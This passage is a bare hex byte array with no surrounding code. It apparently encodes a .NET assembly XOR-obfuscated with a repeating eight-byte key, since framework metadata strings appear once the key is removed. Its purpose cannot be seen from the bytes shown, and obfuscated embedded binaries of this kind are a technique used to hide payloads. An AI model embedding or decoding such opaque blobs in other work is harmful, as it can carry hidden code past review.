0x2A, 0xEC, 0x4E,\n\t0x13, 0x9B, 0x87, 0xEE, 0x95, 0x61, 0xAE, 0x13, 0x4A, 0xDA, 0xD9, 0xFF, 0x87, 0x0C, 0xEB, 0x51,\n\t0x0E, 0x81, 0x9B, 0xB6, 0x9A, 0x21, 0xFB, 0x48, 0x0E, 0x86, 0x88, 0xBF, 0x8B, 0x6F, 0xCE, 0x48,\n\t0x18, 0x98, 0x80, 0xB0, 0xEC, 0x2A, 0xE7, 0x69, 0x15, 0x9F, 0x8C, 0xBD, 0x9A, 0x2D, 0xA9, 0x0A,\n\t0x1B, 0xC1, 0x8A, 0xE6, 0x91, 0x7E, 0xA7, 0x0E, 0x4E, 0x91, 0xD9, 0xEB, 0x9E, 0x12, 0xC3, 0x39,\n\t0x7A, 0xF4, 0xE9, 0xDA, 0xBD, 0x4F, 0x9E, 0x3D, 0x6A, 0xE4, 0xE9, 0xD3, 0xA7, 0x48, 0x9E, 0x3D,\n\t0x7A, 0xFD, 0xED, 0xD3, 0xA7, 0x4F, 0x94, 0x34, 0x5F, 0xF4, 0xE9, 0xD3, 0xAD, 0x47, 0x96, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD9, 0xAF, 0x47, 0x9F, 0x3D, 0x7A, 0xF4, 0xE8, 0xC2, 0xA7, 0x4F, 0x9E, 0x36,\n\t0x7A, 0xF4, 0xE9, 0xD5, 0x81, 0x4F, 0x9E, 0x3D, 0x53, 0xA7, 0x90, 0xA0, 0xD3, 0x2A, 0xF3, 0x13,\n\t0x2D, 0x91, 0x8B, 0xFD, 0xF2, 0x06, 0xB0, 0x6A, 0x1F, 0x96, 0xAA, 0xBC, 0xC9, 0x3B, 0xEC, 0x52,\n\t0x16, 0x87, 0xC7, 0x83, 0xC6, 0x28, 0xFB, 0x59, 0x3E, 0x95, 0x9D, 0xB2, 0xF4, 0x20, 0xEB, 0x4F,\n\t0x19, 0x91, 0xED, 0xD3, 0xA7, 0x4F, 0x98, 0x1A, 0x7A, 0xF4, 0xE9, 0x9E, 0xF4, 0x36, 0xED, 0x49,\n\t0x1F, 0x99, 0xC7, 0x84, 0xC2, 0x2D, 0xB2, 0x1D, 0x2C, 0x91, 0x9B, 0xA0, 0xCE, 0x20, 0xF0, 0x00,\n\t0x48, 0xDA, 0xD9, 0xFD, 0x97, 0x61, 0xAE, 0x11, 0x5A, 0xB7, 0x9C, 0xBF, 0xD3, 0x3A, 0xEC, 0x58,\n\t0x47, 0x9A, 0x8C, 0xA6, 0xD3, 0x3D, 0xFF, 0x51, 0x56, 0xD4, 0xB9, 0xA6, 0xC5, 0x23, 0xF7, 0x5E,\n\t0x31, 0x91, 0x90, 0x87, 0xC8, 0x24, 0xFB, 0x53, 0x47, 0x96, 0xD9, 0xE0, 0xC1, 0x7A, 0xF8, 0x0A,\n\t0x1C, 0xC5, 0xD8, 0xB7, 0x92, 0x7F, 0xFF, 0x0E, 0x1B, 0xE4, 0xFB, 0xD3, 0xA7, 0x4F, 0x99, 0x3D,\n\t0x7A, 0xF4, 0xE0, 0xD6, 0xA7, 0x4F, 0x9E, 0x35, 0x72, 0xF4, 0xE9, 0xD3, 0xA7, 0x47, 0x96, 0x37,\n\t0x7A, 0xF4, 0xE9, 0xDB, 0xA6, 0x4F, 0x96, 0x3C, 0x7A, 0xFC, 0xE8, 0xD3, 0xAF, 0x47, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE8, 0xC0, 0xA7, 0x4F, 0x9E, 0x36, 0x7A, 0xF4, 0xE9, 0xD5, 0x8E, 0x4F, 0x9E, 0x3D,\n\t0x53, 0xA7, 0x90, 0xA0, 0xD3, 0x2A, 0xF3, 0x13, 0x39, 0x9B, 0x84, 0xA3, 0xC8, 0x21, 0xFB, 0x53,\n\t0x0E, 0xB9, 0x86, 0xB7, 0xC2, 0x23, 0xB0, 0x79, 0x1F, 0x87, 0x80, 0xB4, 0xC9, 0x61, 0xDA, 0x58,\n\t0x09, 0x9D, 0x8E, 0xBD, 0xC2, 0x3D, 0xC8, 0x58, 0x08, 0x96, 0xED, 0xD3, 0xA7, 0x4F, 0x98, 0x17,\n\t0x7A, 0xF4, 0xE9, 0x9A, 0xF4, 0x36, 0xED, 0x49, 0x1F, 0x99, 0xC5, 0xF3, 0xF1, 0x2A, 0xEC, 0x4E,\n\t0x13, 0x9B, 0x87, 0xEE, 0x95, 0x61, 0xAE, 0x13, 0x4A, 0xDA, 0xD9, 0xFF, 0x87, 0x0C, 0xEB, 0x51,\n\t0x0E, 0x81, 0x9B, 0xB6, 0x9A, 0x21, 0xFB, 0x48, 0x0E, 0x86, 0x88, 0xBF, 0x8B, 0x6F, 0xCE, 0x48,\n\t0x18, 0x98, 0x80, 0xB0, 0xEC, 0x2A, 0xE7, 0x69, 0x15, 0x9F, 0x8C, 0xBD, 0x9A, 0x2D, 0xA9, 0x0A,\n\t0x1B, 0xC1, 0x8A, 0xE6, 0x91, 0x7E, 0xA7, 0x0E, 0x4E, 0x91, 0xD9, 0xEB, 0x9E, 0x5F, 0x8A, 0x3D,\n\t0x7A, 0xF4, 0xEC, 0xD3, 0xA7, 0x4F, 0x93, 0x3F, 0x73, 0xDF, 0xE9, 0xD3, 0xA7, 0x47, 0x96, 0x3E,\n\t0x7A, 0xF4, 0xE9, 0xDA, 0xAF, 0x4F, 0x9E, 0x3D, 0x7B, 0xE1, 0xE9, 0xD3, 0xA7, 0x44, 0x9E, 0x3D,\n\t0x7A, 0xF2, 0xC4, 0xD3, 0xA7, 0x4F, 0xAA, 0x6E, 0x03, 0x87, 0x9D, 0xB6, 0xCA, 0x61, 0xCC, 0x48,\n\t0x14, 0x80, 0x80, 0xBE, 0xC2, 0x61, 0xCC, 0x58, 0x17, 0x9B, 0x9D, 0xBA, 0xC9, 0x28, 0xB0, 0x7E,\n\t0x12, 0x95, 0x87, 0xBD, 0xC2, 0x23, 0xED, 0x13, 0x3B, 0x93, 0x8E, 0xA1, 0xC2, 0x28, 0xFF, 0x49,\n\t0x1F, 0xB0, 0x80, 0xB0, 0xD3, 0x26, 0xF1, 0x53, 0x1B, 0x86, 0x90, 0xD7, 0xA7, 0x4F, 0x9E, 0x3B,\n\t0x54, 0xF4, 0xE9, 0xD3, 0xEC, 0x22, 0xED, 0x5E, 0x15, 0x86, 0x85, 0xBA, 0xC5, 0x63, 0xBE, 0x6B,\n\t0x1F, 0x86, 0x9A, 0xBA, 0xC8, 0x21, 0xA3, 0x0F, 0x54, 0xC4, 0xC7, 0xE3, 0x89, 0x7F, 0xB2, 0x1D,\n\t0x39, 0x81, 0x85, 0xA7, 0xD2, 0x3D, 0xFB, 0x00, 0x14, 0x91, 0x9C, 0xA7, 0xD5, 0x2E, 0xF2, 0x11,\n\t0x5A, 0xA4, 0x9C, 0xB1, 0xCB, 0x26, 0xFD, 0x76, 0x1F, 0x8D, 0xBD, 0xBC, 0xCC, 0x2A, 0xF0, 0x00,\n\t0x18, 0xC3, 0xDE, 0xB2, 0x92, 0x2C, 0xAB, 0x0B, 0x4B, 0xCD, 0xDA, 0xE7, 0xC2, 0x7F, 0xA6, 0x04,\n\t0x6A, 0xE2, 0xE9, 0xD3, 0xA7, 0x4E, 0x9E, 0x3D, 0x7A, 0xFD, 0xEF, 0xD3, 0xA7, 0x4F, 0x8E, 0x2A,\n\t0x7A, 0xF4, 0xE9, 0xD1, 0xA7, 0x4F, 0x9E, 0x34, 0x7D, 0xF4, 0xE9, 0xD3, 0xAE, 0x48, 0x9E, 0x3D,\n\t0x7A, 0xE4, 0xF1, 0xD3, 0xA7, 0x4F, 0x9C, 0x3D, 0x7A, 0xF4, 0xEF, 0xE2, 0xA7, 0x4F, 0x9E, 0x38,\n\t0x32, 0x91, 0x85, 0xBF, 0xC8, 0x49, 0xAC, 0x3D, 0x7A, 0xF4, 0xEF, 0x9B, 0xC2, 0x23, 0xF2, 0x52,\n\t0x48, 0xF0, 0xF2, 0xD3, 0xA7, 0x4F, 0xE1, 0x6E, 0x03, 0x87, 0x9D, 0xB6, 0xCA, 0x61, 0xDD, 0x52,\n\t0x16, 0x98, 0x8C, 0xB0, 0xD3, 0x26, 0xF1, 0x53, 0x09, 0xDA, 0xAE, 0xB6, 0xC9, 0x2A, 0xEC, 0x54,\n\t0x19, 0xDA, 0xA5, 0xBA, 0xD4, 0x3B, 0xFE, 0x0C, 0x21, 0xAF, 0xBA, 0xAA, 0xD4, 0x3B, 0xFB, 0x50,\n\t0x54, 0xB6, 0x90, 0xA7, 0xC2, 0x14, 0xC3, 0x11, 0x5A, 0x99, 0x9A, 0xB0, 0xC8, 0x3D, 0xF2, 0x54,\n\t0x18, 0xD8, 0xC9, 0x85, 0xC2, 0x3D, 0xED, 0x54, 0x15, 0x9A, 0xD4, 0xE1, 0x89, 0x7F, 0xB0, 0x0D,\n\t0x54, 0xC4, 0xC5, 0xF3, 0xE4, 0x3A, 0xF2, 0x49, 0x0F, 0x86, 0x8C, 0xEE, 0xC9, 0x2A, 0xEB, 0x49,\n\t0x08, 0x95, 0x85, 0xFF, 0x87, 0x1F, 0xEB, 0x5F, 0x16, 0x9D, 0x8A, 0x98, 0xC2, 0x36, 0xCA, 0x52,\n\t0x11, 0x91, 0x87, 0xEE, 0xC5, 0x78, 0xA9, 0x5C, 0x4F, 0x97, 0xDC, 0xE5, 0x96, 0x76, 0xAD, 0x09,\n\t0x1F, 0xC4, 0xD1, 0xEA, 0xFA, 0x12, 0x9D, 0x3D, 0x7A, 0xF4, 0xEF, 0x8C, 0xCE, 0x3B, 0xFB, 0x50,\n\t0x09, 0xF1, 0xB6, 0xA0, 0xCE, 0x35, 0xFB, 0x35, 0x25, 0x82, 0x8C, 0xA1, 0xD4, 0x26, 0xF1, 0x53,\n\t0x79, 0xF4, 0xE9, 0xDC, 0xF4, 0x36, 0xED, 0x49, 0x1F, 0x99, 0xC7, 0x91, 0xDE, 0x3B, 0xFB, 0x66,\n\t0x27, 0xAF, 0xB4, 0xDB, 0xAF, 0x46, 0xAD, 0x3D, 0x7A, 0xF4, 0xE8, 0xD3, 0xA7, 0x4F, 0x9F, 0x3D,\n\t0x7A, 0xF4, 0xED, 0xCF, 0xA7, 0x4F, 0x9E, 0x1F, 0x29, 0x8D, 0x9A, 0xA7, 0xC2, 0x22, 0xB0, 0x79,\n\t0x1F, 0x98, 0x8C, 0xB4, 0xC6, 0x3B, 0xFB, 0x6E, 0x1F, 0x86, 0x80, 0xB2, 0xCB, 0x26, 0xE4, 0x5C,\n\t0x0E, 0x9D, 0x86, 0xBD, 0xEF, 0x20, 0xF2, 0x59, 0x1F, 0x86, 0xEB, 0xD3, 0xA7, 0x4F, 0x96, 0x79,\n\t0x1F, 0x98, 0x8C, 0xB4, 0xC6, 0x3B, 0xFB, 0x3A, 0x17, 0x91, 0x9D, 0xBB, 0xC8, 0x2B, 0xAE, 0x3E,\n\t0x79, 0xC4, 0xBA, 0xAA, 0xD4, 0x3B, 0xFB, 0x50, 0x54, 0xB0, 0x8C, 0xBF, 0xC2, 0x28, 0xFF, 0x49,\n\t0x1F, 0xA7, 0x8C, 0xA1, 0xCE, 0x2E, 0xF2, 0x54, 0x00, 0x95, 0x9D, 0xBA, 0xC8, 0x21, 0xD6, 0x52,\n\t0x16, 0x90, 0x8C, 0xA1, 0x8C, 0x0B, 0xFB, 0x51, 0x1F, 0x93, 0x88, 0xA7, 0xC2, 0x0A, 0xF0, 0x49,\n\t0x08, 0x8D, 0xC6, 0x80, 0xDE, 0x3C, 0xEA, 0x58, 0x17, 0xDA, 0xBB, 0xB6, 0xC1, 0x23, 0xFB, 0x5E,\n\t0x0E, 0x9D, 0x86, 0xBD, 0x89, 0x02, 0xFB, 0x50, 0x18, 0x91, 0x9B, 0x9A, 0xC9, 0x29, 0xF1, 0x6E,\n\t0x1F, 0x86, 0x80, 0xB2, 0xCB, 0x26, 0xE4, 0x5C, 0x0E, 0x9D, 0x86, 0xBD, 0xEF, 0x20, 0xF2, 0x59,\n\t0x1F, 0x86, 0xE0, 0xE7, 0xA7, 0x4F, 0x9E, 0x34, 0x4F, 0xF4, 0xE9, 0xD3, 0xA3, 0x52, 0x9E, 0x3D,\n\t0x7A, 0x7E, 0xE8, 0x80, 0xDE, 0x3C, 0xEA, 0x58, 0x17, 0xDA, 0xAA, 0xBC, 0xCB, 0x23, 0xFB, 0x5E,\n\t0x0E, 0x9D, 0x86, 0xBD, 0xD4, 0x61, 0xD9, 0x58, 0x14, 0x91, 0x9B, 0xBA, 0xC4, 0x61, 0xD2, 0x54,\n\t0x09, 0x80, 0x89, 0xE2, 0x8C, 0x0A, 0xF0, 0x48, 0x17, 0x91, 0x9B, 0xB2, 0xD3, 0x20, 0xEC, 0x66,\n\t0x21, 0xA7, 0x90, 0xA0, 0xD3, 0x2A, 0xF3, 0x13, 0x38, 0x8D, 0x9D, 0xB6, 0xFC, 0x12, 0xB2, 0x1D,\n\t0x17, 0x87, 0x8A, 0xBC, 0xD5, 0x23, 0xF7, 0x5F, 0x56, 0xD4, 0xBF, 0xB6, 0xD5, 0x3C, 0xF7, 0x52,\n\t0x14, 0xC9, 0xDB, 0xFD, 0x97, 0x61, 0xAE, 0x13, 0x4A, 0xD8, 0xC9, 0x90, 0xD2, 0x23, 0xEA, 0x48,\n\t0x08, 0x91, 0xD4, 0xBD, 0xC2, 0x3A, 0xEA, 0x4F, 0x1B, 0x98, 0xC5, 0xF3, 0xF7, 0x3A, 0xFC, 0x51,\n\t0x13, 0x97, 0xA2, 0xB6, 0xDE, 0x1B, 0xF1, 0x56, 0x1F, 0x9A, 0xD4, 0xB1, 0x90, 0x78, 0xFF, 0x08,\n\t0x19, 0xC1, 0xDF, 0xE2, 0x9E, 0x7C, 0xAA, 0x58, 0x4A, 0xCC, 0xD0, 0x8E, 0xFA, 0x4B, 0x9E, 0x3D,\n\t0x7A, 0xF0, 0x85, 0xBA, 0xD4, 0x3B, 0x9B, 0x54, 0x14, 0x90, 0x8C, 0xAB, 0xA0, 0x39, 0xFB, 0x4F,\n\t0x09, 0x9D, 0x86, 0xBD, 0xA0, 0x2C, 0xEB, 0x4F, 0x08, 0x91, 0x87, 0xA7, 0xA4, 0x4F, 0x9E, 0x3A,\n\t0x05, 0xA7, 0x90, 0xA0, 0xD3, 0x2A, 0xF3, 0x13, 0x39, 0x9B, 0x85, 0xBF, 0xC2, 0x2C, 0xEA, 0x54,\n\t0x15, 0x9A, 0x9A, 0xFD, 0xE0, 0x2A, 0xF0, 0x58, 0x08, 0x9D, 0x8A, 0xFD, 0xEB, 0x26, 0xED, 0x49,\n\t0x1A, 0xC5, 0xB2, 0x88, 0xF4, 0x36, 0xED, 0x49, 0x1F, 0x99, 0xC7, 0x91, 0xDE, 0x3B, 0xFB, 0x66,\n\t0x27, 0xD8, 0xC9, 0xBE, 0xD4, 0x2C, 0xF1, 0x4F, 0x16, 0x9D, 0x8B, 0xFF, 0x87, 0x19, 0xFB, 0x4F,\n\t0x09, 0x9D, 0x86, 0xBD, 0x9A, 0x7D, 0xB0, 0x0D, 0x54, 0xC4, 0xC7, 0xE3, 0x8B, 0x6F, 0xDD, 0x48,\n\t0x16, 0x80, 0x9C, 0xA1, 0xC2, 0x72, 0xF0, 0x58, 0x0F, 0x80, 0x9B, 0xB2, 0xCB, 0x63, 0xBE, 0x6D,\n\t0x0F, 0x96, 0x85, 0xBA, 0xC4, 0x04, 0xFB, 0x44, 0x2E, 0x9B, 0x82, 0xB6, 0xC9, 0x72, 0xFC, 0x0A,\n\t0x4D, 0x95, 0xDC, 0xB0, 0x92, 0x79, 0xAF, 0x04, 0x49, 0xC0, 0x8C, 0xE3, 0x9F, 0x76, 0xC3, 0x60,\n\t0x72, 0xFC, 0xEB, 0xD9, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xAD, 0x4E, 0xBF, 0x3D,\n\t0x7A, 0xF4, 0xF5, 0xD3, 0xA7, 0x4F, 0x97, 0x0B, 0x7A, 0xF4, 0xE9, 0xDA, 0x90, 0x4F, 0x9E, 0x3D,\n\t0x7B, 0xD1, 0xE9, 0xD3, 0xA7, 0x53, 0x9E, 0x3D, 0x7A, 0xFD, 0xD1, 0xD3, 0xA7, 0x4F, 0x97, 0x04,\n\t0x7A, 0xF4, 0xE9, 0xD2, 0x8C, 0x4F, 0x9E, 0x3D, 0x79, 0xF4, 0xE9, 0xD3, 0xAE, 0x75, 0x9E, 0x3D,\n\t0x7A, 0xFD, 0xD2, 0xD3, 0xA7, 0x4F, 0x99, 0x0E, 0x7A, 0xF4, 0xE9, 0xD2, 0xA6, 0x4F, 0x9E, 0x3D,\n\t0x7E, 0xF4, 0xE9, 0xD3, 0xA0, 0x4D, 0x97, 0x01, 0x7A, 0xF4, 0xE9, 0xD9, 0xAD, 0x45, 0x9A, 0x09,\n\t0x7A, 0xF4, 0xE9, 0xE3, 0xF4, 0x36, 0xED, 0x49, 0x1F, 0x99, 0xC7, 0x97, 0xC2, 0x23, 0xFB, 0x5A,\n\t0x1B, 0x80, 0x8C, 0x80, 0xC2, 0x3D, 0xF7, 0x5C, 0x16, 0x9D, 0x93, 0xB2, 0xD3, 0x26, 0xF1, 0x53,\n\t0x32, 0x9B, 0x85, 0xB7, 0xC2, 0x3D, 0xB5, 0x79, 0x1F, 0x98, 0x8C, 0xB4, 0xC6, 0x3B, 0xFB, 0x78,\n\t0x14, 0x80, 0x9B, 0xAA, 0xA0, 0x4F, 0x9E, 0x3D, 0x7E, 0x80, 0x90, 0xA3, 0xC2, 0x47, 0xFF, 0x4E,\n\t0x09, 0x91, 0x84, 0xB1, 0xCB, 0x36, 0x98, 0x49, 0x1B, 0x86, 0x8E, 0xB6, 0xD3, 0x5D, 0xEA, 0x5C,\n\t0x08, 0x93, 0x8C, 0xA7, 0xF3, 0x36, 0xEE, 0x58, 0x3B, 0x87, 0x9A, 0xB6, 0xCA, 0x2D, 0xF2, 0x44,\n\t0x74, 0x80, 0x88, 0xA1, 0xC0, 0x2A, 0xEA, 0x69, 0x03, 0x84, 0x8C, 0x9D, 0xC6, 0x22, 0xFB, 0x37,\n\t0x17, 0x91, 0x9D, 0xBB, 0xC8, 0x2B, 0xD0, 0x5C, 0x17, 0x91, 0xE4, 0xB7, 0xC2, 0x23, 0xFB, 0x5A,\n\t0x1B, 0x80, 0x8C, 0x96, 0xC9, 0x3B, 0xEC, 0x44, 0x7B, 0xF5, 0xEB, 0xD2, 0xA6, 0x4E, 0x9D, 0x0D,\n\t0x29, 0x8D, 0x9A, 0xA7, 0xC2, 0x22, 0xB0, 0x79, 0x1F, 0x98, 0x8C, 0xB4, 0xC6, 0x3B, 0xFB, 0x6E,\n\t0x1F, 0x86, 0x80, 0xB2, 0xCB, 0x26, 0xE4, 0x5C, 0x0E, 0x9D, 0x86, 0xBD, 0xEF, 0x20, 0xF2, 0x59,\n\t0x1F, 0x86, 0xC2, 0x97, 0xC2, 0x23, 0xFB, 0x5A, 0x1B, 0x80, 0x8C, 0x96, 0xC9, 0x3B, 0xEC, 0x44,\n\t0x7C, 0xC9, 0xE9, 0xD3, 0xA7, 0x9A, 0x9F, 0x6E, 0x03, 0x87, 0x9D, 0xB6, 0xCA, 0x61, 0xD8, 0x48,\n\t0x14, 0x97, 0x89, 0xE1, 0xFC, 0x14, 0xCD, 0x44, 0x09, 0x80, 0x8C, 0xBE, 0x89, 0x0D, 0xE7, 0x49,\n\t0x1F, 0xAF, 0xB4, 0xFF, 0x87, 0x22, 0xED, 0x5E, 0x15, 0x86, 0x85, 0xBA, 0xC5, 0x63, 0xBE, 0x6B,\n\t0x1F, 0x86, 0x9A, 0xBA, 0xC8, 0x21, 0xA3, 0x0F, 0x54, 0xC4, 0xC7, 0xE3, 0x89, 0x7F, 0xB2, 0x1D,\n\t0x39, 0x81, 0x85, 0xA7, 0xD2, 0x3D, 0xFB, 0x00, 0x14, 0x91, 0x9C, 0xA7, 0xD5, 0x2E, 0xF2, 0x11,\n\t0x5A, 0xA4, 0x9C, 0xB1, 0xCB, 0x26, 0xFD, 0x76, 0x1F, 0x8D, 0xBD, 0xBC, 0xCC, 0x2A, 0xF0, 0x00,\n\t0x18, 0xC3, 0xDE, 0xB2, 0x92, 0x2C, 0xAB, 0x0B, 0x4B, 0xCD, 0xDA, 0xE7, 0xC2, 0x7F, 0xA6, 0x04,\n\t0x27, 0xD8, 0xB2, 0x80, 0xDE, 0x3C, 0xEA, 0x58, 0x17, 0xDA, 0xBB, 0xB6, 0xC1, 0x23, 0xFB, 0x5E,\n\t0x0E, 0x9D, 0x86, 0xBD, 0x89, 0x0E, 0xED, 0x4E, 0x1F, 0x99, 0x8B, 0xBF, 0xDE, 0x63, 0xBE, 0x50,\n\t0x09, 0x97, 0x86, 0xA1, 0xCB, 0x26, 0xFC, 0x11, 0x5A, 0xA2, 0x8C, 0xA1, 0xD4, 0x26, 0xF1, 0x53,\n\t0x47, 0xC6, 0xC7, 0xE3, 0x89, 0x7F, 0xB0, 0x0D, 0x56, 0xD4, 0xAA, 0xA6, 0xCB, 0x3B, 0xEB, 0x4F,\n\t0x1F, 0xC9, 0x87, 0xB6, 0xD2, 0x3B, 0xEC, 0x5C, 0x16, 0xD8, 0xC9, 0x83, 0xD2, 0x2D, 0xF2, 0x54,\n\t0x19, 0xBF, 0x8C, 0xAA, 0xF3, 0x20, 0xF5, 0x58, 0x14, 0xC9, 0x8B, 0xE4, 0x90, 0x2E, 0xAB, 0x5E,\n\t0x4F, 0xC2, 0xD8, 0xEA, 0x94, 0x7B, 0xFB, 0x0D, 0x42, 0xCD, 0xB4, 0x8E, 0xAE, 0x55, 0x9E, 0x3D,\n\t0x7A, 0xFE, 0xE0, 0xFD, 0xA7, 0x4F, 0x9E, 0x3B, 0x3A, 0xF4, 0xE9, 0xD3, 0xBD, 0x1C, 0xE7, 0x4E,\n\t0x0E, 0x91, 0x84, 0xFD, 0xF5, 0x2A, 0xF8, 0x51, 0x1F, 0x97, 0x9D, 0xBA, 0xC8, 0x21, 0xB0, 0x7C,\n\t0x09, 0x87, 0x8C, 0xBE, 0xC5, 0x23, 0xE7, 0x3B, 0x3B, 0xF4, 0xE9, 0xD3, 0xA3, 0x03, 0xF1, 0x5C,\n\t0x1E, 0xFE, 0xED, 0xE6, 0xA7, 0x4F, 0x9E, 0x12, 0x29, 0x8D, 0x9A, 0xA7, 0xC2, 0x22, 0xB0, 0x6F,\n\t0x1F, 0x92, 0x85, 0xB6, 0xC4, 0x3B, 0xF7, 0x52, 0x14, 0xDA, 0xA4, 0xB6, 0xCA, 0x2D, 0xFB, 0x4F,\n\t0x33, 0x9A, 0x8F, 0xBC, 0xF4, 0x2A, 0xEC, 0x54, 0x1B, 0x98, 0x80, 0xA9, 0xC6, 0x3B, 0xF7, 0x52,\n\t0x14, 0xBC, 0x86, 0xBF, 0xC3, 0x2A, 0xEC, 0x3B, 0x7A, 0xF4, 0xE9, 0xD7, 0xE9, 0x2E, 0xF3, 0x58,\n\t0x76, 0xB5, 0x9A, 0xA0, 0xC2, 0x22, 0xFC, 0x51, 0x03, 0xBA, 0x88, 0xBE, 0xC2, 0x46, 0xDD, 0x51,\n\t0x1B, 0x87, 0x9A, 0x9D, 0xC6, 0x22, 0xFB, 0x34, 0x29, 0x9D, 0x8E, 0xBD, 0xC6, 0x3B, 0xEB, 0x4F,\n\t0x1F, 0xFE, 0xA4, 0xB6, 0xCA, 0x2D, 0xFB, 0x4F, 0x2E, 0x8D, 0x99, 0xB6, 0xB7, 0x08, 0xFB, 0x53,\n\t0x1F, 0x86, 0x80, 0xB0, 0xE6, 0x3D, 0xF9, 0x48, 0x17, 0x91, 0x87, 0xA7, 0xD4, 0x4E, 0x9F, 0x3C,\n\t0x7B, 0xF4, 0xEA, 0xDB, 0xAA, 0x1C, 0xE7, 0x4E, 0x0E, 0x91, 0x84, 0xFD, 0xF3, 0x36, 0xEE, 0x58,\n\t0x21, 0xA9, 0xE0, 0x92, 0xA7, 0x4F, 0x9E, 0x34, 0x54, 0xF4, 0xE9, 0xD3, 0xAE, 0x0F, 0x9E, 0x3D,\n\t0x7A, 0xF2, 0xAD, 0xD3, 0xA7, 0x4F, 0xB9, 0x6E, 0x03, 0x87, 0x9D, 0xB6, 0xCA, 0x61, 0xCC, 0x58,\n\t0x1C, 0x98, 0x8C, 0xB0, 0xD3, 0x26, 0xF1, 0x53, 0x54, 0xB5, 0x9A, 0xA0, 0xC2, 0x22, 0xFC, 0x51,\n\t0x03, 0xD4, 0xA5, 0xBC, 0xC6, 0x2B, 0xB6, 0x7F, 0x03, 0x80, 0x8C, 0x88, 0xFA, 0x66, 0x96, 0x3D,\n\t0x7A, 0xF4, 0xE3, 0xD2, 0x91, 0x4F, 0x9E, 0x3D, 0x4E, 0xF4, 0xE9, 0xD3, 0xA1, 0x0A, 0x9E, 0x3D,\n\t0x7A, 0x38, 0xEB, 0x80, 0xDE, 0x3C, 0xEA, 0x58, 0x17, 0xDA, 0xAF, 0xA6, 0xC9, 0x2C, 0xFE, 0x0F,\n\t0x21, 0xAF, 0xBA, 0xAA, 0xD4, 0x3B, 0xFB, 0x50, 0x54, 0xA6, 0x8C, 0xB5, 0xCB, 0x2A, 0xFD, 0x49,\n\t0x13, 0x9B, 0x87, 0xFD, 0xE6, 0x3C, 0xED, 0x58, 0x17, 0x96, 0x85, 0xAA, 0x8B, 0x6F, 0xF3, 0x4E,\n\t0x19, 0x9B, 0x9B, 0xBF, 0xCE, 0x2D, 0xB2, 0x1D, 0x2C, 0x91, 0x9B, 0xA0, 0xCE, 0x20, 0xF0, 0x00,\n\t0x48, 0xDA, 0xD9, 0xFD, 0x97, 0x61, 0xAE, 0x11, 0x5A, 0xB7, 0x9C, 0xBF, 0xD3, 0x3A, 0xEC, 0x58,\n\t0x47, 0x9A, 0x8C, 0xA6, 0xD3, 0x3D, 0xFF, 0x51, 0x56, 0xD4, 0xB9, 0xA6, 0xC5, 0x23, 0xF7, 0x5E,\n\t0x31, 0x91, 0x90, 0x87, 0xC8, 0x24, 0xFB, 0x53, 0x47, 0x96, 0xDE, 0xE4, 0xC6, 0x7A, 0xFD, 0x08,\n\t0x4C, 0xC5, 0xD0, 0xE0, 0x93, 0x2A, 0xAE, 0x05, 0x43, 0xA9, 0xC5, 0x88, 0xF4, 0x36, 0xED, 0x49,\n\t0x1F, 0x99, 0xC7, 0x90, 0xC8, 0x23, 0xF2, 0x58, 0x19, 0x80, 0x80, 0xBC, 0xC9, 0x3C, 0xB0, 0x7A,\n\t0x1F, 0x9A, 0x8C, 0xA1, 0xCE, 0x2C, 0xB0, 0x74, 0x3F, 0x9A, 0x9C, 0xBE, 0xC2, 0x3D, 0xFF, 0x5F,\n\t0x16, 0x91, 0x89, 0xE2, 0xFC, 0x14, 0xCD, 0x44, 0x09, 0x80, 0x8C, 0xBE, 0x89, 0x1B, 0xE7, 0x4D,\n\t0x1F, 0xD8, 0xC9, 0xBE, 0xD4, 0x2C, 0xF1, 0x4F, 0x16, 0x9D, 0x8B, 0xFF, 0x87, 0x19, 0xFB, 0x4F,\n\t0x09, 0x9D, 0x86, 0xBD, 0x9A, 0x7D, 0xB0, 0x0D, 0x54, 0xC4, 0xC7, 0xE3, 0x8B, 0x6F, 0xDD, 0x48,\n\t0x16, 0x80, 0x9C, 0xA1, 0xC2, 0x72, 0xF0, 0x58, 0x0F, 0x80, 0x9B, 0xB2, 0xCB, 0x63, 0xBE, 0x6D,\n\t0x0F, 0x96, 0x85, 0xBA, 0xC4, 0x04, 0xFB, 0x44, 0x2E, 0x9B, 0x82, 0xB6, 0xC9, 0x72, 0xFC, 0x0A,\n\t0x4D, 0x95, 0xDC, 0xB0, 0x92, 0x79, 0xAF, 0x04, 0x49, 0xC0, 0x8C, 0xE3, 0x9F, 0x76, 0xC3, 0x60,\n\t0x56, 0xD4, 0x84, 0xA0, 0xC4, 0x20, 0xEC, 0x51, 0x13, 0x96, 0xC5, 0xF3, 0xF1, 0x2A, 0xEC, 0x4E,\n\t0x13, 0x9B, 0x87, 0xEE, 0x95, 0x61, 0xAE, 0x13, 0x4A, 0xDA, 0xD9, 0xFF, 0x87, 0x0C, 0xEB, 0x51,\n\t0x0E, 0x81, 0x9B, 0xB6, 0x9A, 0x21, 0xFB, 0x48, 0x0E, 0x86, 0x88, 0xBF, 0x8B, 0x6F, 0xCE, 0x48,\n\t0x18, 0x98, 0x80, 0xB0, 0xEC, 0x2A, 0xE7, 0x69, 0x15, 0x9F, 0x8C, 0xBD, 0x9A, 0x2D, 0xA9, 0x0A,\n\t0x1B, 0xC1, 0x8A, 0xE6, 0x91, 0x7E, 0xA7, 0x0E, 0x4E, 0x91, 0xD9, 0xEB, 0x9E, 0x12, 0xC3, 0x34,\n\t0x60, 0xF4, 0xE9, 0xD3, 0xAD, 0x46, 0xB0, 0x3D, 0x7A, 0xF4, 0xE0, 0x93, 0xA7, 0x4F, 0x9E, 0x3B,\n\t0x33, 0xF4, 0xE9, 0xD3, 0xAF, 0x08, 0xFB, 0x49, 0x2E, 0x8D, 0x99, 0xB6, 0xD4, 0x45, 0x9F, 0x0A,\n\t0x7A, 0xF4, 0xE9, 0xE6, 0xA7, 0x4F, 0x9E, 0x34, 0x33, 0xF4, 0xE9, 0xD3, 0xAE, 0x61, 0x9E, 0x3D,\n\t0x7A, 0xFD, 0xA9, 0xD3, 0xA7, 0x4F, 0x98, 0x71, 0x7A, 0xF4, 0xE9, 0xCB, 0xF4, 0x36, 0xED, 0x49,\n\t0x1F, 0x99, 0xC7, 0x87, 0xDE, 0x3F, 0xFB, 0x66, 0x27, 0xD4, 0xAE, 0xB6, 0xD3, 0x1B, 0xE7, 0x4D,\n\t0x1F, 